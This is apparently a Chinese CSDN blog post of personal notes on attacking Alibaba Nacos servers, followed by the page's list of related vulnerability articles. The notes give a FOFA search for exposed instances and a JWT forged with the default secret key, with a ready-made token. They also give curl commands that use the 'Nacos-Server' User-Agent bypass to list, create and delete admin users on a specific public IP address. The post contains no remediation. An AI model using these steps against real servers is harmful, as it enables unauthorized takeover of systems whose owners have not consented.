记一次Nacos漏洞笔记

最新推荐文章于 2024-07-16 01:11:37 发布
最新推荐文章于 2024-07-16 01:11:37 发布
阅读量421 收藏 6
点赞数 4
文章标签: 安全 web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50822277/article/details/139800357
版权

FOFA语法
title==“Nacos”

JWT网址:https://jwt.io/
时间戳网址:https://tool.lu/timestamp/

工具检测历史漏洞

在这里插入图片描述

  • 弱口令进入
    在这里插入图片描述
  • 默认配置

1、 DATA填写如下信息【默认填写】
{
“sub”: “nacos”,
“exp”: 1718861212【时间戳最好修改为明天的】
}
2、VERIFY SIGNATURE打勾并填写如下信息【默认填写】
SecretKey0123456789012345678901234567890123456789012345678901234567893
3、最后的结果eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxODg2MTIxMn0.oxfnJa1uHJqcA3bjp0kv4uMZTgQUAynK2pb2kPrYNq0

3、BP发包修改请求体
在这里插入图片描述
回到抓包页面==> 右键有个拦截 >拦截该请求>把上面的响应包复制到拦截的响应包里面。回到页面即可跳转

  • 未授权绕过

/v1/auth/users?pageNo=1&pageSize=10

在这里插入图片描述
添加用户

1、url:/v1/auth/users
body:username=shangxin&password=shangxin
User-Agent:Nacos-Server

2、kali: curl -X POST ‘http://101.42.21.9/v1/auth/usersusername=shangxin&password=shangxin’
-H ‘User-Agent: Nacos-Server’

删除用户

curl -X DELETE “http://101.42.21.9/v1/auth/users?username=shangxin”

查看用户是否添加成功:

1、/v1/auth/search?username=shangxin

2、curl ‘http://101.42.21.9/v1/auth/search?username=shangxin’

晚来的棠棠
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
nacos权限绕过漏洞(nacos认证绕过安全漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 3396
可以看出在 1.2~1.4.0 的版本期间是存在认证绕过安全漏洞的,是因为 User-Agent 中包含了 Nacos-Server 使得认定请求来自于其他服务端,从而绕过了认证。nacos权限绕过漏洞环境搭建 我们选择版本nacos 1.4.0来对漏洞进行复现 下载安装包后 运行startup.cmd -m standalone 需要在环境变量中设置 JAVA_HOME ,设置完环境变量后重新打开一个命令行 否则并不生效 ,启动的时候最好用管理员权限启动,否则会出现启动不成功的问题
Alibaba Nacos存在默认弱口令漏洞
nnn2188185的博客
03-18 2273
Nacos是阿里巴巴最新开源的项目。 Alibaba Nacos存在弱口令漏洞。攻击者利用默认弱密码登录系统后台,获取敏感信息。
Nacos最新0day漏洞复现
最新发布
qq_55213436的博客
07-16 3492
漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过特制的请求向 Nacos 服务器发送恶意数据,从而执行任意代码。下载nacos代码搭建环境这次漏洞 需要登录到后才才能利用漏洞涉及到 Nacos 在处理反序列化数据时的缺陷,攻击者能够通过特定的 JSON 数据结构,远程执行恶意代码。以利用该漏洞读取敏感文件、执行系统命令。
0-day预警-NACOS RCE-0day漏洞复现
Success696的博客
07-15 2376
配置config.py中的ip和端口,执行service.py。fofa语法: icon_hash=“13942501”ZoomEye语句:app:“Alibaba Nacos”执行exploit.py,输入地址和命令即可执行。下载nacos版本,项目地址。
nacos漏洞汇总
潇逗
06-27 1726
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。指纹:app=“nacos”默认密码nacos nacos
Nacos系统历史CVE漏洞的复现分析与检测
道阻且长,行则将至。
02-07 3163
本文复现、分析、总结了 Nacos 近几年的历史 CVE 漏洞,可以看到大厂发布的开源系统并非“坚不可摧”,很多看似“合理”的业务需求会成为漏洞的发源地。作为开发或运维人员,在引入开源组件或系统到自身业务系统的时候,应该持续关注其是否爆出安全漏洞,并及时升级版本、修复漏洞
图灵Nacos课堂笔记
10-27
图灵Nacos课堂笔记 Nacos是一个动态服务发现、配置管理和服务管理平台,提供了三个核心功能:动态服务发现、配置管理和服务管理。下面将对这三个功能进行详细介绍。 动态服务发现 Nacos提供了动态服务发现功能,...
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用!...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
Nacos漏洞综合利用GUI工具(完整源码+说明)(身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
03-27
【资源说明】 1、该资源内项目代码都是经过测试运行成功,功能正常的情况下才上传...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
Nacos学习笔记-尚硅谷-BV1q3411Z79z
06-06
Nacos是阿里巴巴开源的一款分布式服务治理与配置中心的框架,它致力于简化微服务架构中的服务发现、配置管理和元数据管理任务。Nacos以其易用性、高性能和稳定性,被广泛应用于构建大型分布式系统中。本学习笔记将...
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
Nacos 漏洞利用
huangyongkang666的博客
01-03 7980
在src挖掘中碰到的漏洞,于是了解了一下该漏洞漏洞的利用方式
Nacos 存在JWT密钥硬编码漏洞(MPS-2023-7982)
murphysec的博客
03-15 1879
Nacos 是一个动态服务发现、配置和管理的平台,可用于构建云原生应用程序。 该项目受影响版本存在硬编码漏洞。由于Nacos鉴权时采用默认的token.secret.key,远程攻击者可自行构造JwtToken绕过密钥认证进入后台,进而操控系统。
【问题篇】整改Nacos漏洞——升级Nacos以及开启鉴权问题整理
weixin_56995925的博客
08-06 1万+
整改Nacos漏洞——升级Nacos以及开启鉴权问题整理
Nacos 惊爆安全漏洞,可绕过身份验证!!!
公众号-老炮说Java
01-28 1018
点击上方蓝色字体,选择“标星公众号”优质文章,第一时间送达关注公众号后台回复pay或mall获取实战项目资料+视频作者 :threedr3am来源 :https://github.com...
nacos权限绕过漏洞(CVE-2021-29441)修复
热门推荐
CSDNHmCxy的博客
09-16 2万+
漏扫出服务器的nacos1.2.1版本存在权限绕过漏洞(CVE-2021-29441)漏洞,给出的建议是升级到最新版本,后面去nacos官网当时最新版本是2.0.3,果断换成了当时最新的再让安全人员漏扫发现还是存在,明明官网已经说2.0.0以上版本已经修复了,怎么还是被扫到呢?通过网上翻看资料得到如下解决办法: 1、修改 nacos的application.properties配置文件,开启服务身份识别功能 ### 开启鉴权 nacos.core.auth.enabled=true ### 关闭使用use
Nacos 惊爆安全漏洞,可绕过身份验证(附修复建议)
程序猿DD
01-16 1916
作者 |threedr3am来源 |https://github.com/alibaba/nacos/issues/4701我发现nacos最新版本1.4.1对于User-Agent...
【认证绕过】NACOS身份认证绕过漏洞分析
m0_61572518的博客
04-12 6713
工作中遇到一个nacos服务认证绕过的问题,在此总结一下漏洞原因。
nacos漏洞如何触发
06-03
Nacos存在多个漏洞,不同的漏洞触发方式也不同。以下是一些常见的漏洞触发方式: 1. 认证绕过漏洞:攻击者可以通过构造恶意请求,绕过Nacos的身份认证机制,进而获取敏感信息或者执行未授权操作。 2. SQL注入漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晚来的棠棠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值